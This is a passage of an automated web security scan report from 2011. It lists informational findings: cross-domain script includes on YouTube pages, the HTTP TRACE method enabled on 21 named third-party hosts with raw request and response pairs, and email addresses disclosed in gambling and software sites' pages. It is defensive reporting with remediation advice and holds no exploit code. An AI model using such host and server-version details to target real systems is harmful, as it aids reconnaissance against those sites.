<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>


<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

19.177. http://www.youtube.com/user/PostcodeLottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/PostcodeLottery

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sd1dXU2oteFNMSkZHd0ZhX1FzYkZzMDNQRDJkMTVDSU9HTmxZTk9ITmZXNkRwNGt2blpXSDdB -->
<head>



...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>


<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

19.178. http://www.youtube.com/user/primescratchcards1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/primescratchcards1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmh6U2NNLTZ0UURUcHA1MXdfYjVEQnNxaTVWdFFmSDE4WmcwTG5va3VETmVn -->
<head>



...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-channel-vfl94KsmN.js"></script>


<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflMAM4jp.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

20. TRACE method is enabled
There are 21 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


20.1. http://d.tradex.openx.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 41ea3e0cb3d84673

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 41ea3e0cb3d84673
X-Forwarded-For: 173.193.214.243


20.2. http://d.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 4fb7a64d5b1a4620

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 4fb7a64d5b1a4620


20.3. http://gmpg.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gmpg.org
Path:   /

Request

TRACE / HTTP/1.0
Host: gmpg.org
Cookie: f8c2ad5d39cc13f5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: gmpg.org
Cookie: f8c2ad5d39cc13f5


20.4. http://jquery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Request

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 2401d6c9d1210be1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:48 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 2401d6c9d1210be1


20.5. http://jquery.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /

Request

TRACE / HTTP/1.0
Host: jquery.org
Cookie: 6071a5dca55ed7d4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:16 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.org
Cookie: 6071a5dca55ed7d4


20.6. http://m.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: e7af286216a13948

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: e7af286216a13948


20.7. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: f0d936249002cee9

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:39:10 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f0d936249002cee9
Host: optimized-by.rubiconproject.com
X-Forwarded-For: 173.193.214.243


20.8. https://sealinfo.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sealinfo.verisign.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sealinfo.verisign.com
Cookie: 8ab7015dd036c842

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:10:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sealinfo.verisign.com
Cookie: 8ab7015dd036c842


20.9. http://secure-us.imrworldwide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: e7871189ff1dc743

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e7871189ff1dc743
Host: secure-us.imrworldwide.com


20.10. http://sizzlejs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sizzlejs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: 4aedf1bebccec63f

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: 4aedf1bebccec63f


20.11. http://winter.metacafe.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://winter.metacafe.com
Path:   /

Request

TRACE / HTTP/1.0
Host: winter.metacafe.com
Cookie: fcd839e4e85761a5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: winter.metacafe.com
Cookie: fcd839e4e85761a5
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


20.12. http://www.egba.eu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egba.eu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.egba.eu
Cookie: b871ba3cd96d0a7b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:50 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.egba.eu
Cookie: b871ba3cd96d0a7b


20.13. http://www.gambleaware.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gambleaware.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gambleaware.co.uk
Cookie: 7f6234ae21e402af

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gambleaware.co.uk
Cookie: 7f6234ae21e402af


20.14. http://www.gamcare.org.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamcare.org.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gamcare.org.uk
Cookie: 1786de8ed51ce151

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:01:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gamcare.org.uk
Cookie: 1786de8ed51ce151


20.15. http://www.gx4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gx4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gx4.com
Cookie: 6c42e7b711c1f33b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gx4.com
Cookie: 6c42e7b711c1f33b


20.16. http://www.nedstat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nedstat.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nedstat.com
Cookie: 9e344073c266d407

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.nedstat.com
Cookie: 9e344073c266d407


20.17. http://www.opensource.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.opensource.org
Cookie: 87ff0c14b8055ebf

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.opensource.org
Cookie: 87ff0c14b8055ebf


20.18. http://www.postcodelottery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: d9306f7a9dc91

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: d9306f7a9dc91


20.19. https://www.postcodelottery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: c5cb8855e66ac46e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.postcodelottery.com
Cookie: c5cb8855e66ac46e


20.20. http://www.quirksmode.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quirksmode.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.quirksmode.org
Cookie: 9e47897ed15c6d2b

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:11:02 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7d
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9e47897ed15c6d2b
Host: www.quirksmode.org


20.21. http://www.tstglobal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tstglobal.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tstglobal.com
Cookie: 7400a7f0dd155449

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tstglobal.com
Cookie: 7400a7f0dd155449


21. Email addresses disclosed
There are 73 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ble.hs.llnwd.net
Path:   /e1/betsson/en/df_CoreJsRoot_v105046.js

Issue detail

The following email address was disclosed in the response:

Request

GET /e1/betsson/en/df_CoreJsRoot_v105046.js HTTP/1.1
Host: ble.hs.llnwd.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 16 May 2011 12:00:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: max-age=86400
Accept-Ranges: bytes
ETag: "992f95aec3e7cb1:0"
X-Powered-By: ASP.NET
Age: 1720
Last-Modified: Mon, 21 Mar 2011 12:29:54 GMT
Expires: Tue, 17 May 2011 11:31:30 GMT
Content-Length: 218783

...String.Format=function(format){for(var i=1,j=arguments.length;i<j;i++){var exp=new RegExp("\\{"+(i-1)+"\\}","gm");format=format.replace(exp,arguments[i])}return format};String.Empty="";String.IsNul
...[SNIP]...
ur")})}})(jQuery);
var $j=jQuery.noConflict();/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
(function($)
{

...[SNIP]...

21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ble.hs.llnwd.net
Path:   /e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js

Issue detail

The following email address was disclosed in the response:

Request

GET /e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js HTTP/1.1
Host: ble.hs.llnwd.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 16 May 2011 12:00:07 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: max-age=86400
Accept-Ranges: bytes
ETag: "2027ac25260cc1:0"
X-Powered-By: ASP.NET
Last-Modified: Thu, 21 Apr 2011 13:15:12 GMT
Expires: Tue, 17 May 2011 12:00:06 GMT
Content-Length: 230271

...var jsChatLink = 'http://customer.service.ehosts.net/netagent/cimlogin.aspx?questid=8CB80F4B-955F-4313-9106-7BF7009A6932&portid=B7CED77E-FA6D-4943-AE01-005BF189F266&nareferer={referrer}';
var jsCh
...[SNIP]...
;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject

/*
ModalBox - The pop-up window thingie with AJAX, based on prototype and script.aculo.us.

Copyright Andrey Okonetchnikov (andrej.okonetschnikow@gmail.com), 2006-2007
All rights reserved.

VERSION 1.5.4
Last Modified: 07/16/2007
*/
if(!window.Modalbox){var Modalbox=new Object()}Modalbox.Methods={options:{title:"ModalBox Window",overlayClose:true,
...[SNIP]...

21.3. https://members.bet365.com/members/chat/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://members.bet365.com
Path:   /members/chat/

Issue detail

The following email address was disclosed in the response:

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:34:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
p3p: CP="CAO PSA OUR"
p3p: CP="CAO PSA OUR"
Set-Cookie: session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   bet365
</
...[SNIP]...
<a id="lnkContactEmail" class="b" href="#" onclick="javascript:WebForm.MailToClick('lnkContactEmail','support@customerservices365.com','%0D%0A%0D%0A'); return false;">
...[SNIP]...

21.4. http://neogames-tech.com/careers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://neogames-tech.com
Path:   /careers

Issue detail

The following email addresses were disclosed in the response:

Request

GET /careers HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:jobs@neogames.com">recruitment@neogames.com</a>
...[SNIP]...

21.5. http://neogames-tech.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://neogames-tech.com
Path:   /contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/corporate/gaming-license
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979

Response

HTTP/1.1 200 OK
Content-Length: 7505
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...
<a href="mailto:support@neogames.com">support@neogames.com</a>
...[SNIP]...
<a href="mailto:recruitment@neogames.com">recruitment@neogames.com</a>
...[SNIP]...
<a href="mailto:info@neogames.com">info@neogames.com</a>
...[SNIP]...

21.6. http://neogames-tech.com/corporate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://neogames-tech.com
Path:   /corporate

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.7. http://primescratchcards.com/images/HelpDepositMethods.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.8. http://primescratchcards.com/images/InviteFriend.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.9. http://primescratchcards.com/images/Responsible.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
